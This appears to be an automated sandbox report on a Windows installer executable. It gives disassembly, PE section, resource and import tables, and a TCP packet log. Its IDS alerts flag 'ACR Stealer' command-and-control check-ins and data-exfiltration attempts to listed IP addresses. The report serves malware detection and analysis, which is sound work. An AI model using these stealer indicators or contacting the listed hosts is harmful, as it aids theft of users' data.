                                                                                                                                                                                                                                                    mov eax, dword ptr [006B9D24h]
                                                                                                                                                                                                                                                    push eax
                                                                                                                                                                                                                                                    push 006B9DBCh
                                                                                                                                                                                                                                                    mov eax, dword ptr [006CEEC4h]
                                                                                                                                                                                                                                                    mov eax, dword ptr [eax]
                                                                                                                                                                                                                                                    call 00007F239C7675C8h
                                                                                                                                                                                                                                                    mov eax, 006B499Ch
                                                                                                                                                                                                                                                    mov edx, dword ptr [006CED3Ch]
                                                                                                                                                                                                                                                    mov dword ptr [edx], eax
                                                                                                                                                                                                                                                    call 00007F239C868D32h
                                                                                                                                                                                                                                                    xor eax, eax
                                                                                                                                                                                                                                                    pop edx
                                                                                                                                                                                                                                                    pop ecx
                                                                                                                                                                                                                                                    pop ecx
                                                                                                                                                                                                                                                    mov dword ptr fs:[eax], edx
                                                                                                                                                                                                                                                    jmp 00007F239C87455Bh
                                                                                                                                                                                                                                                    jmp 00007F239C5B837Fh
                                                                                                                                                                                                                                                    call 00007F239C868A7Ah
                                                                                                                                                                                                                                                    mov eax, 00000001h
                                                                                                                                                                                                                                                    call 00007F239C5B8E68h
                                                                                                                                                                                                                                                    call 00007F239C5B87C3h
                                                                                                                                                                                                                                                    mov eax, dword ptr [006CEEC4h]
                                                                                                                                                                                                                                                    mov eax, dword ptr [eax]
                                                                                                                                                                                                                                                    mov edx, 006C5884h
                                                                                                                                                                                                                                                    call 00007F239C767092h
                                                                                                                                                                                                                                                    push 00000005h
                                                                                                                                                                                                                                                    mov eax, dword ptr [006CEEC4h]
                                                                                                                                                                                                                                                    mov eax, dword ptr [eax]
                                                                                                                                                                                                                                                    mov eax, dword ptr [eax+00000188h]

                                                                                                                                                                                                                                                    Data Directories

                                                                                                                                                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x2dd0000x97.edata
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x2d80000x39ba.idata
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x2e00000xdda00.rsrc
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x48fd03f0x21d0
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x2df0000x18.rdata
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x2d89f00x8c4.idata
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x2dc0000xbde.didata
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                                    Sections

                                                                                                                                                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                    .text0x10000x2c16100x2c1800dae0b06841f0c93b7de0b99e55fb3be3unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                    .itext0x2c30000x28900x2a0016393e4e7bec78a4bcae5ae55f8f292cFalse0.5015811011904762data6.1019414475775875IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                    .data0x2c60000x91e00x9200042a801fd25918b12ad83daff139f4d4False0.5827536386986302data6.263961718314003IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                    .bss0x2d00000x79000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                    .idata0x2d80000x39ba0x3a0003081ba482d19e9b1cd93a470ca85644False0.3356007543103448data5.288947298357307IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                    .didata0x2dc0000xbde0xc00c332bb295f400e296d2b360ecd996bd0False0.3502604166666667data4.388049073777676IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                    .edata0x2dd0000x970x200c2fbf23dade9282f5d6f41b22deec17cFalse0.25data1.851215117761671IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                    .tls0x2de0000x4c0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                    .rdata0x2df0000x5d0x200b334cafcb8aaba886c7aff7f26845b05False0.189453125data1.3626936858228273IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                    .rsrc0x2e00000xdda000xdda0088b5e0fc2fdb080a46f261ffd6c35a4aFalse0.558020921460801data7.336237770749843IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                                                    Resources

                                                                                                                                                                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                    RT_CURSOR0x2e10b00x134Targa image data - Map 64 x 65536 x 1 +32 "\001"EnglishUnited States0.38636363636363635
                                                                                                                                                                                                                                                    RT_CURSOR0x2e11e40x134dataEnglishUnited States0.4642857142857143
                                                                                                                                                                                                                                                    RT_CURSOR0x2e13180x134dataEnglishUnited States0.4805194805194805
                                                                                                                                                                                                                                                    RT_CURSOR0x2e144c0x134dataEnglishUnited States0.38311688311688313
                                                                                                                                                                                                                                                    RT_CURSOR0x2e15800x134dataEnglishUnited States0.36038961038961037
                                                                                                                                                                                                                                                    RT_CURSOR0x2e16b40x134dataEnglishUnited States0.4090909090909091
                                                                                                                                                                                                                                                    RT_CURSOR0x2e17e80x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4967532467532468
                                                                                                                                                                                                                                                    RT_ICON0x2e191c0x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.04227680680207841
                                                                                                                                                                                                                                                    RT_ICON0x2e5b440x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.07157676348547717
                                                                                                                                                                                                                                                    RT_ICON0x2e80ec0x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.08794559099437148
                                                                                                                                                                                                                                                    RT_ICON0x2e91940x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.11891828058573453
                                                                                                                                                                                                                                                    RT_ICON0x2ed3bc0x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.1578838174273859
                                                                                                                                                                                                                                                    RT_ICON0x2ef9640x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.010333018422295701
                                                                                                                                                                                                                                                    RT_ICON0x2f3b8c0x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.026763485477178422
                                                                                                                                                                                                                                                    RT_ICON0x2f61340x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.02626641651031895
                                                                                                                                                                                                                                                    RT_ICON0x2f71dc0x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.15806754221388367
                                                                                                                                                                                                                                                    RT_ICON0x2f82840x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.27172131147540984
                                                                                                                                                                                                                                                    RT_ICON0x2f8c0c0x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.350177304964539
                                                                                                                                                                                                                                                    RT_ICON0x2f90740x3732PNG image data, 256 x 256, 8-bit colormap, non-interlacedEnglishUnited States0.9632696390658174
                                                                                                                                                                                                                                                    RT_ICON0x2fc7a80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2688EnglishUnited States0.5783582089552238
                                                                                                                                                                                                                                                    RT_ICON0x2fd6500x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1152EnglishUnited States0.6678700361010831
                                                                                                                                                                                                                                                    RT_ICON0x2fdef80x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 672EnglishUnited States0.6716589861751152
                                                                                                                                                                                                                                                    RT_ICON0x2fe5c00x568Device independent bitmap graphic, 16 x 32 x 8, image size 320EnglishUnited States0.4667630057803468
                                                                                                                                                                                                                                                    RT_ICON0x2feb280xb96bPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9835464638591022
                                                                                                                                                                                                                                                    RT_ICON0x30a4940x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.6
                                                                                                                                                                                                                                                    RT_ICON0x30ca3c0x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.6887898686679175
                                                                                                                                                                                                                                                    RT_ICON0x30dae40x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.5491803278688525
                                                                                                                                                                                                                                                    RT_ICON0x30e46c0x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.3537234042553192
                                                                                                                                                                                                                                                    RT_STRING0x30e8d40x210data0.3125
                                                                                                                                                                                                                                                    RT_STRING0x30eae40x440data0.37683823529411764
                                                                                                                                                                                                                                                    RT_STRING0x30ef240x2b4data0.45809248554913296
                                                                                                                                                                                                                                                    RT_STRING0x30f1d80x214data0.4605263157894737
                                                                                                                                                                                                                                                    RT_STRING0x30f3ec0x3e4data0.3885542168674699
                                                                                                                                                                                                                                                    RT_STRING0x30f7d00x3a0data0.4191810344827586
                                                                                                                                                                                                                                                    RT_STRING0x30fb700x1ecdata0.5609756097560976
                                                                                                                                                                                                                                                    RT_STRING0x30fd5c0xccdata0.6666666666666666
                                                                                                                                                                                                                                                    RT_STRING0x30fe280x294data0.4681818181818182
                                                                                                                                                                                                                                                    RT_STRING0x3100bc0x3e8data0.372
                                                                                                                                                                                                                                                    RT_STRING0x3104a40x488data0.41293103448275864
                                                                                                                                                                                                                                                    RT_STRING0x31092c0x418data0.28435114503816794
                                                                                                                                                                                                                                                    RT_STRING0x310d440x370data0.4147727272727273
                                                                                                                                                                                                                                                    RT_STRING0x3110b40x39cdata0.41233766233766234
                                                                                                                                                                                                                                                    RT_STRING0x3114500x4a4data0.382996632996633
                                                                                                                                                                                                                                                    RT_STRING0x3118f40x384data0.37333333333333335
                                                                                                                                                                                                                                                    RT_STRING0x311c780x454data0.3935018050541516
                                                                                                                                                                                                                                                    RT_STRING0x3120cc0x210data0.39015151515151514
                                                                                                                                                                                                                                                    RT_STRING0x3122dc0xbcdata0.6542553191489362
                                                                                                                                                                                                                                                    RT_STRING0x3123980x100data0.62890625
                                                                                                                                                                                                                                                    RT_STRING0x3124980x338data0.4223300970873786
                                                                                                                                                                                                                                                    RT_STRING0x3127d00x3f0data0.34226190476190477
                                                                                                                                                                                                                                                    RT_STRING0x312bc00x314data0.38578680203045684
                                                                                                                                                                                                                                                    RT_STRING0x312ed40x2f8data0.38026315789473686
                                                                                                                                                                                                                                                    RT_RCDATA0x3131cc0x10data1.5
                                                                                                                                                                                                                                                    RT_RCDATA0x3131dc0x1800PE32+ executable (console) x86-64, for MS WindowsEnglishUnited States0.3924153645833333
                                                                                                                                                                                                                                                    RT_RCDATA0x3149dc0xb70data0.5358606557377049
                                                                                                                                                                                                                                                    RT_RCDATA0x31554c0x147Delphi compiled form 'TMainForm'0.746177370030581
                                                                                                                                                                                                                                                    RT_RCDATA0x3156940x480Delphi compiled form 'TNewDiskForm'0.5052083333333334
                                                                                                                                                                                                                                                    RT_RCDATA0x315b140x400Delphi compiled form 'TSelectFolderForm'0.5087890625
                                                                                                                                                                                                                                                    RT_RCDATA0x315f140x4b5Delphi compiled form 'TSelectLanguageForm'0.5004149377593361
                                                                                                                                                                                                                                                    RT_RCDATA0x3163cc0x7e3Delphi compiled form 'TUninstallProgressForm'0.40713224368499257
                                                                                                                                                                                                                                                    RT_RCDATA0x316bb00x55cDelphi compiled form 'TUninstSharedFileForm'0.41690962099125367
                                                                                                                                                                                                                                                    RT_RCDATA0x31710c0x2ac9Delphi compiled form 'TWizardForm'0.19811923673879303
                                                                                                                                                                                                                                                    RT_GROUP_CURSOR0x319bd80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                                                                                                                                                                    RT_GROUP_CURSOR0x319bec0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                                                                                                                                                                    RT_GROUP_CURSOR0x319c000x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                    RT_GROUP_CURSOR0x319c140x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                    RT_GROUP_CURSOR0x319c280x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                    RT_GROUP_CURSOR0x319c3c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                    RT_GROUP_CURSOR0x319c500x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                    RT_GROUP_ICON0x319c640x92dataEnglishUnited States0.6643835616438356
                                                                                                                                                                                                                                                    RT_GROUP_ICON0x319cf80x30dataEnglishUnited States0.9375
                                                                                                                                                                                                                                                    RT_GROUP_ICON0x319d280x22dataEnglishUnited States1.0588235294117647
                                                                                                                                                                                                                                                    RT_GROUP_ICON0x319d4c0x30dataEnglishUnited States0.9375
                                                                                                                                                                                                                                                    RT_GROUP_ICON0x319d7c0x30dataEnglishUnited States0.9583333333333334
                                                                                                                                                                                                                                                    RT_VERSION0x319dac0x514dataEnglishUnited States0.30846153846153845
                                                                                                                                                                                                                                                    RT_MANIFEST0x31a2c00x765XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.39091389329107235

                                                                                                                                                                                                                                                    Imports

                                                                                                                                                                                                                                                    DLLImport
                                                                                                                                                                                                                                                    mpr.dllWNetEnumResourceW, WNetGetUniversalNameW, WNetGetConnectionW, WNetCloseEnum, WNetOpenEnumW
                                                                                                                                                                                                                                                    comdlg32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                                                                                                                                                                                                    comctl32.dllFlatSB_SetScrollInfo, InitCommonControls, ImageList_DragMove, ImageList_Destroy, _TrackMouseEvent, ImageList_DragShowNolock, ImageList_Add, FlatSB_SetScrollProp, ImageList_GetDragImage, ImageList_Create, ImageList_EndDrag, ImageList_DrawEx, ImageList_SetImageCount, FlatSB_GetScrollPos, FlatSB_SetScrollPos, InitializeFlatSB, FlatSB_GetScrollInfo, ImageList_Write, ImageList_SetBkColor, ImageList_GetBkColor, ImageList_BeginDrag, ImageList_GetIcon, ImageList_GetImageCount, ImageList_DragEnter, ImageList_GetIconSize, ImageList_SetIconSize, ImageList_Read, ImageList_DragLeave, ImageList_Draw, ImageList_Remove
                                                                                                                                                                                                                                                    shell32.dllSHBrowseForFolderW, SHGetMalloc, SHGetFileInfoW, SHChangeNotify, Shell_NotifyIconW, ShellExecuteW, SHGetPathFromIDListW, ShellExecuteExW
                                                                                                                                                                                                                                                    user32.dllCopyImage, CreateWindowExW, GetMenuItemInfoW, SetMenuItemInfoW, DefFrameProcW, GetDCEx, GetMessageW, PeekMessageW, MonitorFromWindow, GetDlgCtrlID, ScrollWindowEx, SetTimer, WindowFromPoint, BeginPaint, RegisterClipboardFormatW, FrameRect, MapVirtualKeyW, OffsetRect, IsWindowUnicode, RegisterWindowMessageW, FillRect, GetMenuStringW, DispatchMessageW, SendMessageA, DefMDIChildProcW, EnumWindows, GetClassInfoW, GetSystemMenu, WaitForInputIdle, ShowOwnedPopups, GetScrollRange, GetScrollPos, SetScrollPos, GetActiveWindow, SetActiveWindow, DrawEdge, InflateRect, GetKeyboardLayoutList, OemToCharBuffA, LoadBitmapW, DrawFocusRect, EnumChildWindows, GetScrollBarInfo, SendNotifyMessageW, ReleaseCapture, UnhookWindowsHookEx, LoadCursorW, GetCapture, SetCapture, CreatePopupMenu, ScrollWindow, ShowCaret, GetMenuItemID, GetLastActivePopup, CharLowerBuffW, GetSystemMetrics, SetWindowLongW, PostMessageW, DrawMenuBar, SetParent, IsZoomed, CharUpperBuffW, GetClientRect, IsChild, ClientToScreen, SetWindowPlacement, IsIconic, CallNextHookEx, GetMonitorInfoW, ShowWindow, CheckMenuItem, CharUpperW, DefWindowProcW, GetForegroundWindow, SetForegroundWindow, GetWindowTextW, EnableWindow, DestroyWindow, IsDialogMessageW, EndMenu, RegisterClassW, CharNextW, GetWindowThreadProcessId, RedrawWindow, GetDC, GetFocus, SetFocus, EndPaint, ExitWindowsEx, ReleaseDC, MsgWaitForMultipleObjectsEx, LoadKeyboardLayoutW, GetClassLongW, ActivateKeyboardLayout, GetParent, CharToOemBuffA, DrawTextW, SetScrollRange, InsertMenuItemW, PeekMessageA, GetPropW, SetClassLongW, MessageBoxW, MessageBeep, SetPropW, SetRectEmpty, UpdateWindow, RemovePropW, GetSubMenu, MsgWaitForMultipleObjects, DestroyMenu, DestroyIcon, SetWindowsHookExW, IsWindowVisible, DispatchMessageA, UnregisterClassW, GetTopWindow, SendMessageW, AdjustWindowRectEx, DrawIcon, IsWindow, EnumThreadWindows, InvalidateRect, GetKeyboardState, DrawFrameControl, ScreenToClient, SendMessageTimeoutW, BringWindowToTop, SetCursor, CreateIcon, CreateMenu, LoadStringW, CharLowerW, SetWindowPos, SetWindowRgn, GetMenuItemCount, RemoveMenu, AppendMenuW, GetSysColorBrush, GetKeyboardLayoutNameW, GetWindowDC, TranslateMessage, DrawTextExW, MapWindowPoints, EnumDisplayMonitors, CallWindowProcW, DestroyCursor, ReplyMessage, GetScrollInfo, SetWindowTextW, GetMessageExtraInfo, EnableScrollBar, GetSysColor, TrackPopupMenu, DrawIconEx, PostQuitMessage, GetClassNameW, ShowScrollBar, EnableMenuItem, GetIconInfo, GetMessagePos, LoadImageW, SetScrollInfo, GetKeyNameTextW, GetDesktopWindow, GetCursorPos, SetCursorPos, HideCaret, GetMenu, GetMenuState, SetMenu, SetRect, GetKeyState, FindWindowExW, MonitorFromPoint, SystemParametersInfoW, LoadIconW, GetCursor, GetWindow, GetWindowLongW, GetWindowRect, InsertMenuW, KillTimer, WaitMessage, IsWindowEnabled, IsDialogMessageA, TranslateMDISysAccel, GetWindowPlacement, FindWindowW, DeleteMenu, GetKeyboardLayout
                                                                                                                                                                                                                                                    version.dllGetFileVersionInfoSizeW, VerQueryValueW, GetFileVersionInfoW
                                                                                                                                                                                                                                                    oleaut32.dllSafeArrayPutElement, LoadTypeLib, GetErrorInfo, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, SafeArrayCreate, SafeArrayGetElement, GetActiveObject, SysAllocStringLen, SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, VariantCopy, RegisterTypeLib, VariantChangeType, VariantCopyInd
                                                                                                                                                                                                                                                    advapi32.dllRegSetValueExW, ConvertStringSecurityDescriptorToSecurityDescriptorW, OpenThreadToken, GetUserNameW, RegQueryInfoKeyW, EqualSid, GetTokenInformation, RegCreateKeyExW, SetSecurityDescriptorDacl, RegEnumKeyExW, AdjustTokenPrivileges, RegDeleteKeyW, LookupPrivilegeValueW, RegOpenKeyExW, OpenProcessToken, FreeSid, AllocateAndInitializeSid, RegDeleteValueW, RegFlushKey, RegEnumValueW, RegQueryValueExW, ConvertSidToStringSidW, RegCloseKey, InitializeSecurityDescriptor
                                                                                                                                                                                                                                                    netapi32.dllNetWkstaGetInfo, NetApiBufferFree
                                                                                                                                                                                                                                                    msvcrt.dllmemcpy
                                                                                                                                                                                                                                                    winhttp.dllWinHttpGetIEProxyConfigForCurrentUser, WinHttpSetTimeouts, WinHttpSetStatusCallback, WinHttpConnect, WinHttpReceiveResponse, WinHttpQueryAuthSchemes, WinHttpGetProxyForUrl, WinHttpReadData, WinHttpCloseHandle, WinHttpQueryHeaders, WinHttpOpenRequest, WinHttpAddRequestHeaders, WinHttpOpen, WinHttpWriteData, WinHttpSetCredentials, WinHttpQueryDataAvailable, WinHttpSetOption, WinHttpSendRequest, WinHttpQueryOption
                                                                                                                                                                                                                                                    kernel32.dllSetFileAttributesW, SetFileTime, GetACP, GetExitCodeProcess, IsBadWritePtr, CloseHandle, LocalFree, GetCurrentProcessId, SizeofResource, VirtualProtect, TerminateThread, QueryPerformanceFrequency, IsDebuggerPresent, FindNextFileW, GetFullPathNameW, VirtualFree, HeapAlloc, ExitProcess, WriteProfileStringW, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetTimeZoneInformation, FileTimeToLocalFileTime, GetModuleHandleW, FreeLibrary, HeapDestroy, CompareFileTime, ReadFile, CreateProcessW, TransactNamedPipe, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, OpenMutexW, CreateThread, CompareStringW, CopyFileW, CreateMutexW, LoadLibraryA, ResetEvent, MulDiv, FreeResource, GetDriveTypeW, GetVersion, RaiseException, MoveFileW, GlobalAddAtomW, GetSystemTimeAsFileTime, FormatMessageW, OpenProcess, SwitchToThread, GetExitCodeThread, OutputDebugStringW, GetCurrentThread, GetLogicalDrives, LocalFileTimeToFileTime, SetNamedPipeHandleState, LoadLibraryExW, TerminateProcess, LockResource, FileTimeToSystemTime, GetShortPathNameW, GetCurrentThreadId, UnhandledExceptionFilter, MoveFileExW, GlobalFindAtomW, VirtualQuery, GlobalFree, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, ReleaseMutex, FlushFileBuffers, LoadResource, SuspendThread, GetTickCount, WritePrivateProfileStringW, GetFileSize, GlobalDeleteAtom, GetStartupInfoW, GetFileAttributesW, GetCurrentDirectoryW, SetCurrentDirectoryW, InitializeCriticalSection, GetSystemWindowsDirectoryW, GetThreadPriority, GetCurrentProcess, SetThreadPriority, VirtualAlloc, GetSystemInfo, GetCommandLineW, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, DeviceIoControl, LCMapStringW, GetDiskFreeSpaceW, VerSetConditionMask, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, lstrcmpW, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetEnvironmentVariableW, GetLocalTime, WaitForSingleObject, WriteFile, CreateNamedPipeW, ExitThread, DeleteCriticalSection, GetDateFormatW, TlsGetValue, SetErrorMode, GetComputerNameW, IsValidLocale, TlsSetValue, CreateDirectoryW, GetOverlappedResult, GetSystemDefaultUILanguage, EnumCalendarInfoW, GetProfileStringW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, IsDBCSLeadByte, CreateEventW, GetPrivateProfileStringW, WaitForMultipleObjectsEx, GetThreadLocale, SetThreadLocale
                                                                                                                                                                                                                                                    ole32.dllStgCreateDocfileOnILockBytes, CoCreateInstance, CLSIDFromString, CoUninitialize, IsEqualGUID, OleInitialize, CoFreeUnusedLibraries, CreateILockBytesOnHGlobal, CLSIDFromProgID, OleUninitialize, CoDisconnectObject, CoInitialize, CoTaskMemFree, CoTaskMemAlloc, StringFromCLSID
                                                                                                                                                                                                                                                    gdi32.dllArc, Pie, SetBkMode, SelectPalette, CreateCompatibleBitmap, ExcludeClipRect, RectVisible, SetWindowOrgEx, MaskBlt, AngleArc, Chord, SetTextColor, StretchBlt, SetDIBits, SetViewportOrgEx, CreateRectRgn, RealizePalette, SetDIBColorTable, GetDIBColorTable, RoundRect, RestoreDC, SetRectRgn, GetTextMetricsW, RemoveFontResourceW, GetWindowOrgEx, CreatePalette, CreateBrushIndirect, PatBlt, LineDDA, PolyBezierTo, GetStockObject, CreateSolidBrush, Polygon, Rectangle, MoveToEx, DeleteDC, SaveDC, BitBlt, Ellipse, FrameRgn, GetDeviceCaps, GetBitmapBits, GetTextExtentPoint32W, GetClipBox, Polyline, IntersectClipRect, GetSystemPaletteEntries, CreateBitmap, AddFontResourceW, CreateDIBitmap, GetStretchBltMode, CreateDIBSection, CreatePenIndirect, SetStretchBltMode, GetDIBits, CreateFontIndirectW, PolyBezier, LineTo, GetRgnBox, EnumFontsW, CreateHalftonePalette, DeleteObject, SelectObject, ExtFloodFill, UnrealizeObject, SetBkColor, CreateCompatibleDC, GetObjectW, GetBrushOrgEx, GetCurrentPositionEx, SetROP2, GetTextExtentPointW, ExtTextOutW, SetBrushOrgEx, GetPixel, ArcTo, GdiFlush, SetPixel, EnumFontFamiliesExW, GetPaletteEntries

                                                                                                                                                                                                                                                    Exports

                                                                                                                                                                                                                                                    NameOrdinalAddress
                                                                                                                                                                                                                                                    TMethodImplementationIntercept30x4b5e78
                                                                                                                                                                                                                                                    __dbk_fcall_wrapper20x410a7c
                                                                                                                                                                                                                                                    dbkFCallWrapperAddr10x6d3640

                                                                                                                                                                                                                                                    Possible Origin

                                                                                                                                                                                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                                    EnglishUnited States

                                                                                                                                                                                                                                                    Network Behavior

                                                                                                                                                                                                                                                    Suricata IDS Alerts

                                                                                                                                                                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                    2024-12-27T21:27:36.583256+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.449732104.121.10.34443TCP
                                                                                                                                                                                                                                                    2024-12-27T21:27:38.720224+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.449734104.21.2.114443TCP
                                                                                                                                                                                                                                                    2024-12-27T21:27:38.720224+01002052674ET MALWARE ACR Stealer CnC Checkin Attempt1192.168.2.449734104.21.2.114443TCP
                                                                                                                                                                                                                                                    2024-12-27T21:27:40.836719+01002052675ET MALWARE ACR Stealer Data Exfiltration Attempt M11192.168.2.449736104.21.2.114443TCP

                                                                                                                                                                                                                                                    Network Port Distribution

                                                                                                                                                                                                                                                    TCP Packets

                                                                                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:27.185359001 CET49675443192.168.2.4173.222.162.32
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:30.951014042 CET4972480192.168.2.4199.232.210.172
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:34.316169024 CET49732443192.168.2.4104.121.10.34
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:34.316215038 CET44349732104.121.10.34192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:34.316289902 CET49732443192.168.2.4104.121.10.34
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:34.325628042 CET49732443192.168.2.4104.121.10.34
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:34.325649977 CET44349732104.121.10.34192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:35.715195894 CET44349732104.121.10.34192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:35.715394020 CET49732443192.168.2.4104.121.10.34
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:35.764772892 CET49732443192.168.2.4104.121.10.34
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:35.764805079 CET44349732104.121.10.34192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:35.765022039 CET44349732104.121.10.34192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:35.767867088 CET49732443192.168.2.4104.121.10.34
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:35.771039009 CET49732443192.168.2.4104.121.10.34
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:35.811352968 CET44349732104.121.10.34192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:36.583302021 CET44349732104.121.10.34192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:36.583328009 CET44349732104.121.10.34192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:36.583342075 CET44349732104.121.10.34192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:36.583384037 CET49732443192.168.2.4104.121.10.34
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:36.583415031 CET44349732104.121.10.34192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:36.583431959 CET49732443192.168.2.4104.121.10.34
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:36.583458900 CET49732443192.168.2.4104.121.10.34
